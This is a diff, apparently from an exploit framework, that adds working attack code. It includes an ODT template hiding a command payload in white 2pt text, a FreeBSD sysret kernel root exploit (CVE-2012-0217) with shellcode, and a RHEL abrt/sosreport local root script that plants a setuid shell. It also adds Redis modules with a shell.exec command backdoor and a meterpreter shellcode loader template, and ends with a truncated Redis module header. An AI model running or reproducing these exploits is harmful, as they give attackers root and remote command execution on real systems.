+  <style:style style:name="P8" style:family="paragraph" style:parent-style-name="Preformatted_20_Text"><style:text-properties fo:color="#ffffff" fo:font-size="2pt" officeooo:rsid="00443c94" officeooo:paragraph-rsid="00443c94" style:font-size-asian="2pt" style:font-size-complex="2pt"/></style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+  <text:p text:style-name="P8"><%= @cmd %></text:p>
+  <text:p text:style-name="Standard">#<%= text_content %></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -0,0 +1,345 @@
+// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+// Copyright 2012 all right reserved, not for commercial uses, bitches
+// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+#include <machine/cpufunc.h>
+#define _WANT_UCRED
+#include <sys/proc.h>
+#include <machine/segments.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
+
+struct gate_descriptor * sidt()
+{
+	struct region_descriptor idt;
+
+	asm ("sidt %0": "=m"(idt));
+
+	return (struct gate_descriptor*)idt.rd_base;
+} 
+
+u_long get_symaddr(char *symname)
+{
+	struct kld_sym_lookup ksym;
+
+	ksym.version = sizeof (ksym);
+	ksym.symname = symname;
+
+	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return ksym.symvalue;
+}
+
+// Code taken from amd64/amd64/machdep.c
+void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
+{
+	struct gate_descriptor *ip;
+
+	ip = idt + idx;
+	ip->gd_looffset = func;
+	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
+	ip->gd_ist = ist;
+	ip->gd_xx = 0;
+	ip->gd_type = typ;
+	ip->gd_dpl = dpl;
+	ip->gd_p = 1;
+	ip->gd_hioffset = func>>16;
+}
+
+void shellcode()
+{
+	// Actually we dont really need to spawn a shell since we
+	// changed our whole cred struct.
+	// Just exit...
+	printf("[*] Got root!\n");
+	exit(0);
+}
+
+void kernelmodepayload()
+{
+	struct thread *td;
+	struct ucred *cred;
+
+	// We need to restore/recover whatever we smashed
+	// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
+	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
+	// idt[18], idt[17] and idt[16]
+	// thus overall we have:
+	// - idt[18], idt[17] and idt[16] are trashed
+	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
+	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
+	// - rdi -> overwrites the 64bit-LSB of idt[7]
+	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
+	struct gate_descriptor *idt = sidt();
+	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
+	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
+	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
+	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
+	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
+	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
+	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
+	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
+	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
+
+	// get the thread pointer
+	asm ("mov %%gs:0, %0" : "=r"(td));
+
+	// The Dark Knight Rises
+	cred = td->td_proc->p_ucred;
+	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
+	cred->cr_groups[0] = 0;
+
+	// return to user mode to spawn the shell
+	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+}
+
+#define TRIGGERCODESIZE 20
+#define TRAMPOLINECODESIZE 18
+
+void trigger()
+{
+	printf("[*] Setup...\n");
+	// Allocate one page just before the non-canonical address
+	printf("    [+] Trigger code...\n");
+	uint64_t pagesize = getpagesize();
+	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
+	area = mmap(area, pagesize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (area == MAP_FAILED) {
+		perror("mmap (trigger)");
+		exit(1);
+	}
+
+	// Copy the trigger code at the end of the page
+	// such that the syscall instruction is at its
+	// boundary
+	char triggercode[] =
+		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
+		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
+		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
+		"\x0f\x05"; // syscall
+
+	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
+	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
+
+	// There are two outcomes given a target rsp:
+	// - if rsp can't be written to, a double fault is triggered
+	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to a special stack
+	// - otherwise a #GP is triggered
+	//	 (Xprot defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to [rsp]
+	//
+	// In the latter case, trouble is... #GP triggers a page fault
+	// (Xpage):
+	//  IDTVEC(prot)
+	//  	subq	$TF_ERR,%rsp
+	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
+	//  [2]	movq	$0,TF_ADDR(%rsp)
+	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
+	//  	leaq	doreti_iret(%rip),%rdi
+	//  	cmpq	%rdi,TF_RIP(%rsp)
+	//  	je	1f			/* kernel but with user gsbase!! */
+	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
+	//  	jz	2f			/* already running with kernel GS.base */
+	//  1:	swapgs
+	//  2:	movq	PCPU(CURPCB),%rdi [5]
+	//
+	// [4] sets the Z flag because we come from the kernel (while executing sysret)
+	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
+	// it was restored just before calling sysret...
+	// Thus, [5] triggers a pagefault while trying to access gs:data
+	// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
+	//
+	// We therefore need a way: (1) to recover from the GP, (2) to clean
+	// any mess we did. Both could be solved if we can get get an arbitrary
+	// code execution by the time we reach [5] (NB: this is not mandatory, we could
+	// get the code execution later down the fault trigger chain)
+	//
+	// So... here is the idea: wouldn't it be nice if we could overwrite the
+	// page fault handler's address and therefore get code execution when [5]
+	// triggers the #PF?
+	//
+	// For reference:
+	// Gate descriptor:
+	// +0: Target Offset[15:0] | Target Selector
+	// +4: Some stuff | Target Offset[31:16]
+	// +8: Target Offset[63:32]
+	// +12: Stuff
+	//
+	// and from include/frame.h:
+	//  struct trapframe {
+	//  	register_t	tf_rdi;
+	//  	register_t	tf_rsi;
+	//  	register_t	tf_rdx;
+	//  	register_t	tf_rcx;
+	//  	register_t	tf_r8;
+	//  	register_t	tf_r9;
+	//  	register_t	tf_rax;
+	//  	register_t	tf_rbx;
+	//  	register_t	tf_rbp;
+	//  	register_t	tf_r10;
+	//  	register_t	tf_r11;
+	//  	register_t	tf_r12;
+	//  	register_t	tf_r13;
+	//  	register_t	tf_r14;
+	//  	register_t	tf_r15;
+	//  	uint32_t	tf_trapno;
+	//  	uint16_t	tf_fs;
+	//  	uint16_t	tf_gs;
+	//  	register_t	tf_addr;
+	//  	uint32_t	tf_flags;
+	//  	uint16_t	tf_es;
+	//  	uint16_t	tf_ds;
+	//  	/* below portion defined in hardware */
+	//  	register_t	tf_err;
+	//  	register_t	tf_rip;
+	//  	register_t	tf_cs;
+	//  	register_t	tf_rflags;
+	//  	register_t	tf_rsp;
+	//  	register_t	tf_ss;
+	//  };
+	//
+	// When the exception is triggered, the hardware pushes
+	// ss, rsp, rflags, cs, rip and err
+	//
+	// We can see that [1], [2] and [3] write to the stack
+	// [3] is fully user-controlled through rdi, so we could try to align
+	// rsp such that [3] overwrites the offset address
+	//
+	// The trouble is... rsp is 16byte aligned for exceptions. We can
+	// therefore only overwrite the first 32-LSB of the offset address
+	// (check how rdi is 16byte aligned in this trapframe)
+	//
+	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
+	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
+	// and tf_trapno is 16byte aligned + 8!
+	// This enables us to set Target Offset[63:32] to 0x9
+	//
+	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
+	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
+	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
+	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
+	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
+	// some setup and jump to our kernel mode code
+	printf("    [+] Trampoline code...\n");
+	char trampolinecode[] =
+		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
+		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
+		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
+		"\xff\xe0"; // jmp rax
+
+	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
+	size_t trampoline_allocsize = pagesize;
+	// We round the address to the PAGESIZE for the allocation
+	// Not enough space for the trampoline code ?
+	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
+		trampoline_allocsize += pagesize;
+	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
+	{
+		perror("mmap (trampoline)");
+		exit(1);
+	}
+	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
+	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
+	// Call it
+	printf("[*] Fire in the hole!\n");
+	((void (*)())trigger_addr)();
+}
+
+typedef struct validtarget
+{
+	char * sysname;
+	char * release;
+	char * machine;
+} validtarget_t;
+
+int validate_target(char * sysname, char * release, char * machine)
+{
+	validtarget_t targets[] = {
+		{ "FreeBSD", "8.3-RELEASE", "amd64" },
+		{ "FreeBSD", "9.0-RELEASE", "amd64" },
+		{ 0, 0, 0 }
+	};
+
+	int found = 0;
+	int i = 0;
+
+	while (!found && targets[i].sysname) {
+		found = !strcmp(targets[i].sysname, sysname)
+			&& !strcmp(targets[i].release, release)
+			&& !strcmp(targets[i].machine, machine);
+		++i;
+	}
+	return found;
+}
+
+void get_cpu_vendor(char * cpu_vendor)
+{
+	u_int regs[4];
+
+	do_cpuid(0, regs);
+   ((u_int *)cpu_vendor)[0] = regs[1];
+   ((u_int *)cpu_vendor)[1] = regs[3];
+   ((u_int *)cpu_vendor)[2] = regs[2];
+   cpu_vendor[12] = '\0';
+}
+
+int is_intel()
+{
+	char cpu_vendor[13];
+
+	get_cpu_vendor(cpu_vendor);
+	return !strcmp(cpu_vendor, "GenuineIntel");
+}
+
+int main(int argc, char *argv[])
+{
+	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
+
+	printf("[*] Retrieving host information...\n");
+	char cpu_vendor[13];
+	get_cpu_vendor(cpu_vendor);
+	struct utsname ver;
+	uname(&ver);
+	printf("    [+] CPU: %s\n", cpu_vendor);
+	printf("    [+] sysname: %s\n", ver.sysname);
+	printf("    [+] release: %s\n", ver.release);
+	printf("    [+] version: %s\n", ver.version);
+	printf("    [+] machine: %s\n", ver.machine);
+	printf("[*] Validating target OS and version...\n");
+	if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
+		printf("    [+] NOT Vulnerable :-(\n");
+		exit(1);
+	} else
+		printf("    [+] Vulnerable :-)\n");
+	// Prepare the values we'll need to restore the kernel to a stable state
+	printf("[*] Resolving kernel addresses...\n");
+	Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
+	Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
+	Xill_ptr = (uintptr_t)get_symaddr("Xill");
+	Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
+	Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
+	Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
+	Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
+	Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
+	Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
+	// doeet!
+	trigger();
+	return 0;
+}
+
@@ -0,0 +1,114 @@
+#!/usr/bin/python
+# CVE-2015-5287 (?)
+# abrt/sosreport RHEL 7.0/7.1 local root
+# rebel 09/2015
+
+# [user@localhost ~]$ python sosreport-rhel7.py
+# crashing pid 19143
+# waiting for dump directory
+# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
+# waiting for sosreport directory
+# sosreport:  sosreport-localhost.localdomain-20151130194114
+# waiting for tmpfiles
+# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
+# moving directory
+# moving tmpfiles
+# tmpurfpyY -> tmpurfpyY.old
+# tmpYnCfnQ -> tmpYnCfnQ.old
+# waiting for sosreport to finish (can take several minutes)........................................done
+# success
+# bash-4.2# id
+# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+# bash-4.2# cat /etc/redhat-release 
+# Red Hat Enterprise Linux Server release 7.1 (Maipo)
+
+import os,sys,glob,time,sys,socket
+
+payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
+
+pid = os.fork()
+
+if pid == 0:
+	os.execl("/usr/bin/sleep","sleep","100")
+
+time.sleep(0.5)
+
+print "crashing pid %d" % pid
+
+os.kill(pid,11)
+
+print "waiting for dump directory"
+
+def waitpath(p):
+	while 1:
+		r = glob.glob(p)
+		if len(r) > 0:
+			return r
+		time.sleep(0.05)	
+
+dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
+
+print "dump directory: ", dumpdir
+
+os.chdir(dumpdir)
+
+print "waiting for sosreport directory"
+
+sosreport = waitpath("sosreport-*")[0]
+
+print "sosreport: ", sosreport
+
+print "waiting for tmpfiles"
+tmpfiles = waitpath("tmp*")
+
+print "tmpfiles: ", tmpfiles
+
+print "moving directory"
+
+os.rename(sosreport, sosreport + ".old")
+os.mkdir(sosreport)
+os.chmod(sosreport,0777)
+
+os.mkdir(sosreport + "/sos_logs")
+os.chmod(sosreport + "/sos_logs",0777)
+
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
+
+print "moving tmpfiles"
+
+for x in tmpfiles:
+	print "%s -> %s" % (x,x + ".old")
+	os.rename(x, x + ".old")
+	open(x, "w+").write("/tmp/hax.sh\n")
+	os.chmod(x,0666)
+
+
+os.chdir("/")
+
+sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
+
+
+def trigger():
+	open("/tmp/hax.sh","w+").write(payload)
+	os.chmod("/tmp/hax.sh",0755)
+	try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
+	except: pass
+	time.sleep(0.5)
+	try:
+		os.stat("/tmp/sh")
+	except:
+		print "could not create suid"
+		sys.exit(-1)
+	print "success"
+	os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
+	sys.exit(-1)
+
+for x in xrange(0,60*10):
+	if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
+		print "done"
+		trigger()
+	time.sleep(1)
+	sys.stderr.write(".")
+
+print "timed out"
@@ -0,0 +1,35 @@
+#set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=./
+endif
+
+ifndef RMUTIL_LIBDIR
+	RMUTIL_LIBDIR=./rmutil
+endif
+
+# find the OS
+uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not')
+
+# Compile flags for linux / osx
+ifeq ($(uname_S),Linux)
+	SHOBJ_CFLAGS ?=  -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -shared -Bsymbolic
+else
+	SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup
+endif
+CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack 
+CC=gcc
+
+all: rmutil module.so
+
+rmutil: FORCE
+	$(MAKE) -C $(RMUTIL_LIBDIR)
+
+module.so: module.o
+	$(LD) -o $@ module.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack
+
+clean:
+	rm -rf *.xo *.so *.o
+
+FORCE:
@@ -0,0 +1,35 @@
+#set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=../
+endif
+
+ifndef RMUTIL_LIBDIR
+	RMUTIL_LIBDIR=../rmutil
+endif
+
+# find the OS
+uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not')
+
+# Compile flags for linux / osx
+ifeq ($(uname_S),Linux)
+	SHOBJ_CFLAGS ?=  -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -shared -Bsymbolic
+else
+	SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup
+endif
+CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack 
+CC=gcc
+
+all: rmutil exp.so
+
+rmutil: FORCE
+	$(MAKE) -C $(RMUTIL_LIBDIR)
+
+exp.so: exp.o
+	$(LD) -o $@ exp.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack
+
+clean:
+	rm -rf *.xo *.so *.o
+
+FORCE:
@@ -0,0 +1,47 @@
+#include "redismodule.h"
+
+#include <stdio.h> 
+#include <unistd.h>  
+#include <stdlib.h> 
+#include <errno.h>   
+#include <sys/wait.h>
+#include <sys/types.h> 
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+        if (argc == 2) {
+                size_t cmd_len;
+                size_t size = 1024;
+                char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
+
+                FILE *fp = popen(cmd, "r");
+                char *buf, *output;
+                buf = (char *)malloc(size);
+                output = (char *)malloc(size);
+                while ( fgets(buf, sizeof(buf), fp) != 0 ) {
+                        if (strlen(buf) + strlen(output) >= size) {
+                                output = realloc(output, size<<2);
+                                size <<= 1;
+                        }
+                        strcat(output, buf);
+                }
+                RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output));
+                RedisModule_ReplyWithString(ctx, ret);
+                pclose(fp);
+        } else {
+                return RedisModule_WrongArity(ctx);
+        }
+        return REDISMODULE_OK;
+}
+
+int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+    if (RedisModule_Init(ctx,"shell",1,REDISMODULE_APIVER_1)
+                        == REDISMODULE_ERR) return REDISMODULE_ERR;
+
+    if (RedisModule_CreateCommand(ctx, "shell.exec",
+        Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR)
+        return REDISMODULE_ERR;
+
+    return REDISMODULE_OK;
+}
@@ -0,0 +1,23 @@
+## Intro
+
+This is a compiled shared object file of redis module.
+
+## Load redis extension
+
+```
+MODULE load ./exp.so
+```
+
+## Run command
+
+```
+redis-cli
+127.0.0.1:6379> shell.exec "whoami"
+```
+## Compile
+
+You can modify the exp.c source code if you want.
+And the compile it to exp.so in current directory.
+```
+make
+```
@@ -0,0 +1,38 @@
+#include "redismodule.h"
+
+#include <stdio.h> 
+#include <unistd.h>  
+#include <stdlib.h> 
+#include <errno.h>   
+#include <sys/wait.h>
+#include <sys/types.h> 
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+
+    pid_t child_pid = fork();
+    if (child_pid == 0)
+    {
+        // Your meterpreter shell here
+        <%= buf %>
+
+        int (*ret)() = (int(*)())buf;
+        ret();
+    }
+    else
+        {wait(NULL);}
+
+    return REDISMODULE_OK;
+}
+
+
+int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+    if (RedisModule_Init(ctx,<%= @module_init_name.inspect %>,1,REDISMODULE_APIVER_1)
+                        == REDISMODULE_ERR) return REDISMODULE_ERR;
+
+    if (RedisModule_CreateCommand(ctx, <%= @module_cmd.inspect %>,
+        Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR)
+        return REDISMODULE_ERR;
+    return REDISMODULE_OK;
+}
@@ -0,0 +1,509 @@
+#ifndef REDISMODULE_H
+#define REDISMODULE_H
+
+#include <sys/types.h>
+#include <stdint.h>
+#include <stdio.h>
+
+/* ---------------- Defines common between core and modules --------------- */
+
+/* Error status return values. */
+#define REDISMODULE_OK 0
+#define REDISMODULE_ERR 1
+
+/* API versions. */
+#define REDISMODULE_APIVER_1 1
+
+/* API flags and constants */
+#define REDISMODULE_READ (1<<0)
+#define REDISMODULE_WRITE (1<<1)
+
+#define REDISMODULE_LIST_HEAD 0
+#define REDISMODULE_LIST_TAIL 1
+
+/* Key types. */
+#define REDISMODULE_KEYTYPE_EMPTY 0
+#define REDISMODULE_KEYTYPE_STRING 1
+#define REDISMODULE_KEYTYPE_LIST 2
+#define REDISMODULE_KEYTYPE_HASH 3
+#define REDISMODULE_KEYTYPE_SET 4
+#define REDISMODULE_KEYTYPE_ZSET 5
+#define REDISMODULE_KEYTYPE_MODULE 6
+
+/* Reply types. */
+#define REDISMODULE_REPLY_UNKNOWN -1
+#define REDISMODULE_REPLY_STRING 0
+#define REDISMODULE_REPLY_ERROR 1
+#define REDISMODULE_REPLY_INTEGER 2
+#define REDISMODULE_REPLY_ARRAY 3
+#define REDISMODULE_REPLY_NULL 4
+
+/* Postponed array length. */
+#define REDISMODULE_POSTPONED_ARRAY_LEN -1
+
+/* Expire */
+#define REDISMODULE_NO_EXPIRE -1
+
+/* Sorted set API flags. */
+#define REDISMODULE_ZADD_XX      (1<<0)
+#define REDISMODULE_ZADD_NX      (1<<1)
+#define REDISMODULE_ZADD_ADDED   (1<<2)
+#define REDISMODULE_ZADD_UPDATED (1<<3)
+#define REDISMODULE_ZADD_NOP     (1<<4)
+
+/* Hash API flags. */
+#define REDISMODULE_HASH_NONE       0
+#define REDISMODULE_HASH_NX         (1<<0)
+#define REDISMODULE_HASH_XX         (1<<1)
+#define REDISMODULE_HASH_CFIELDS    (1<<2)
+#define REDISMODULE_HASH_EXISTS     (1<<3)
+
+/* Context Flags: Info about the current context returned by
+ * RM_GetContextFlags(). */
+
+/* The command is running in the context of a Lua script */
+#define REDISMODULE_CTX_FLAGS_LUA (1<<0)
+/* The command is running inside a Redis transaction */
+#define REDISMODULE_CTX_FLAGS_MULTI (1<<1)
+/* The instance is a master */
+#define REDISMODULE_CTX_FLAGS_MASTER (1<<2)
+/* The instance is a slave */
+#define REDISMODULE_CTX_FLAGS_SLAVE (1<<3)
+/* The instance is read-only (usually meaning it's a slave as well) */
+#define REDISMODULE_CTX_FLAGS_READONLY (1<<4)
+/* The instance is running in cluster mode */
+#define REDISMODULE_CTX_FLAGS_CLUSTER (1<<5)
+/* The instance has AOF enabled */
+#define REDISMODULE_CTX_FLAGS_AOF (1<<6)
+/* The instance has RDB enabled */
+#define REDISMODULE_CTX_FLAGS_RDB (1<<7)
+/* The instance has Maxmemory set */
+#define REDISMODULE_CTX_FLAGS_MAXMEMORY (1<<8)
+/* Maxmemory is set and has an eviction policy that may delete keys */
+#define REDISMODULE_CTX_FLAGS_EVICT (1<<9)
+/* Redis is out of memory according to the maxmemory flag. */
+#define REDISMODULE_CTX_FLAGS_OOM (1<<10)
+/* Less than 25% of memory available according to maxmemory. */
+#define REDISMODULE_CTX_FLAGS_OOM_WARNING (1<<11)
+
+#define REDISMODULE_NOTIFY_GENERIC (1<<2)     /* g */
+#define REDISMODULE_NOTIFY_STRING (1<<3)      /* $ */
+#define REDISMODULE_NOTIFY_LIST (1<<4)        /* l */
+#define REDISMODULE_NOTIFY_SET (1<<5)         /* s */
+#define REDISMODULE_NOTIFY_HASH (1<<6)        /* h */
+#define REDISMODULE_NOTIFY_ZSET (1<<7)        /* z */
+#define REDISMODULE_NOTIFY_EXPIRED (1<<8)     /* x */
+#define REDISMODULE_NOTIFY_EVICTED (1<<9)     /* e */
+#define REDISMODULE_NOTIFY_STREAM (1<<10)     /* t */
+#define REDISMODULE_NOTIFY_ALL (REDISMODULE_NOTIFY_GENERIC | REDISMODULE_NOTIFY_STRING | REDISMODULE_NOTIFY_LIST | REDISMODULE_NOTIFY_SET | REDISMODULE_NOTIFY_HASH | REDISMODULE_NOTIFY_ZSET | REDISMODULE_NOTIFY_EXPIRED | REDISMODULE_NOTIFY_EVICTED | REDISMODULE_NOTIFY_STREAM)      /* A */
+
+
+/* A special pointer that we can use between the core and the module to signal
+ * field deletion, and that is impossible to be a valid pointer. */
+#define REDISMODULE_HASH_DELETE ((RedisModuleString*)(long)1)
+
+/* Error messages. */
+#define REDISMODULE_ERRORMSG_WRONGTYPE "WRONGTYPE Operation against a key holding the wrong kind of value"
+
+#define REDISMODULE_POSITIVE_INFINITE (1.0/0.0)
+#define REDISMODULE_NEGATIVE_INFINITE (-1.0/0.0)
+
+/* Cluster API defines. */
+#define REDISMODULE_NODE_ID_LEN 40
+#define REDISMODULE_NODE_MYSELF     (1<<0)
+#define REDISMODULE_NODE_MASTER     (1<<1)
+#define REDISMODULE_NODE_SLAVE      (1<<2)
+#define REDISMODULE_NODE_PFAIL      (1<<3)
+#define REDISMODULE_NODE_FAIL       (1<<4)
+#define REDISMODULE_NODE_NOFAILOVER (1<<5)
+
+#define REDISMODULE_CLUSTER_FLAG_NONE 0
+#define REDISMODULE_CLUSTER_FLAG_NO_FAILOVER (1<<1)
+#define REDISMODULE_CLUSTER_FLAG_NO_REDIRECTION (1<<2)
+
+#define REDISMODULE_NOT_USED(V) ((void) V)
+
+/* This type represents a timer handle, and is returned when a timer is
+ * registered and used in order to invalidate a timer. It's just a 64 bit
+ * number, because this is how each timer is represented inside the radix tree
+ * of timers that are going to expire, sorted by expire time. */
+typedef uint64_t RedisModuleTimerID;
+
+/* ------------------------- End of common defines ------------------------ */
+
+#ifndef REDISMODULE_CORE
+
+typedef long long mstime_t;
+
+/* Incomplete structures for compiler checks but opaque access. */
+typedef struct RedisModuleCtx RedisModuleCtx;
+typedef struct RedisModuleKey RedisModuleKey;
+typedef struct RedisModuleString RedisModuleString;
+typedef struct RedisModuleCallReply RedisModuleCallReply;
+typedef struct RedisModuleIO RedisModuleIO;
+typedef struct RedisModuleType RedisModuleType;
+typedef struct RedisModuleDigest RedisModuleDigest;
+typedef struct RedisModuleBlockedClient RedisModuleBlockedClient;
+typedef struct RedisModuleClusterInfo RedisModuleClusterInfo;
+typedef struct RedisModuleDict RedisModuleDict;
+typedef struct RedisModuleDictIter RedisModuleDictIter;
+
+typedef int (*RedisModuleCmdFunc)(RedisModuleCtx *ctx, RedisModuleString **argv, int argc);
+typedef void (*RedisModuleDisconnectFunc)(RedisModuleCtx *ctx, RedisModuleBlockedClient *bc);
+typedef int (*RedisModuleNotificationFunc)(RedisModuleCtx *ctx, int type, const char *event, RedisModuleString *key);
+typedef void *(*RedisModuleTypeLoadFunc)(RedisModuleIO *rdb, int encver);
+typedef void (*RedisModuleTypeSaveFunc)(RedisModuleIO *rdb, void *value);
+typedef void (*RedisModuleTypeRewriteFunc)(RedisModuleIO *aof, RedisModuleString *key, void *value);
+typedef size_t (*RedisModuleTypeMemUsageFunc)(const void *value);
+typedef void (*RedisModuleTypeDigestFunc)(RedisModuleDigest *digest, void *value);
+typedef void (*RedisModuleTypeFreeFunc)(void *value);
+typedef void (*RedisModuleClusterMessageReceiver)(RedisModuleCtx *ctx, const char *sender_id, uint8_t type, const unsigned char *payload, uint32_t len);
+typedef void (*RedisModuleTimerProc)(RedisModuleCtx *ctx, void *data);
+
+#define REDISMODULE_TYPE_METHOD_VERSION 1
+typedef struct RedisModuleTypeMethods {
+    uint64_t version;
+    RedisModuleTypeLoadFunc rdb_load;
+    RedisModuleTypeSaveFunc rdb_save;
+    RedisModuleTypeRewriteFunc aof_rewrite;
